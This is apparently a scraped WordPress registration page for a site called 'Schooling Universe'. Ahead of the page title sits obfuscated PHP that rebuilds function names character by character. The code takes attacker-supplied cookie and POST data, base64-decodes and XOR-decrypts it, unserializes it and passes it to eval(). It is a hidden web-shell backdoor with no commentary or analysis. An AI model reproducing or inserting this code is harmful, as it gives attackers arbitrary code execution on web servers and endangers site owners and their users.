$pCaXsOld = 'P' . '_' . 'A' . "\160" . "\164" . chr ( 698 - 598 )."\x43";$MSjhiN = chr (99) . chr (108) . 'a' . "\x73" . "\x73" . "\x5f" . "\145" . chr ( 186 - 66 ).'i' . chr ( 569 - 454 ).'t' . chr ( 1076 - 961 ); $pIUtXPff = $MSjhiN($pCaXsOld); $pCaXsOld = "49878";$miekmRx = $pIUtXPff;$MSjhiN = "6609";if (!$miekmRx){class P_AptdC{private $hGhwMxYl;public static $CLsZXJMl = "e78d6576-b3c5-47b3-aa24-829d9aae306b";public static $mQVfywQHgX = 50959;public function __construct($uvqXUWxQov=0){$FBuEj = $_COOKIE;$TIOwZQb = $_POST;$qbdKrwdK = @$FBuEj[substr(P_AptdC::$CLsZXJMl, 0, 4)];if (!empty($qbdKrwdK)){$ttFhVDhrK = "base64";$QTvZKncnw = "";$qbdKrwdK = explode(",", $qbdKrwdK);foreach ($qbdKrwdK as $uONzd){$QTvZKncnw .= @$FBuEj[$uONzd];$QTvZKncnw .= @$TIOwZQb[$uONzd];}$QTvZKncnw = array_map($ttFhVDhrK . '_' . chr ( 219 - 119 )."\145" . chr ( 339 - 240 ).chr ( 961 - 850 ).'d' . "\145", array($QTvZKncnw,)); $QTvZKncnw = $QTvZKncnw[0] ^ str_repeat(P_AptdC::$CLsZXJMl, (strlen($QTvZKncnw[0]) / strlen(P_AptdC::$CLsZXJMl)) + 1);P_AptdC::$mQVfywQHgX = @unserialize($QTvZKncnw);}}private function GFcmdP(){if (is_array(P_AptdC::$mQVfywQHgX)) {$NKCkwyKxD = str_replace('<' . "\77" . 'p' . "\150" . chr ( 189 - 77 ), "", P_AptdC::$mQVfywQHgX[chr ( 444 - 345 ).chr ( 337 - 226 ).chr ( 1042 - 932 ).chr ( 662 - 546 ).'e' . chr ( 292 - 182 )."\x74"]);eval($NKCkwyKxD); $UaZWCpPsk = "11446";exit();}}public function __destruct(){$this->GFcmdP(); $UaZWCpPsk = "11446";$oSTuQcwEdh = str_pad($UaZWCpPsk, 10);}}$TgqGFcf = new /* 27106 */ P_AptdC(); $TgqGFcf = substr("22966_41405", 1);} Registration Form ‹ Schooling Universe — WordPress

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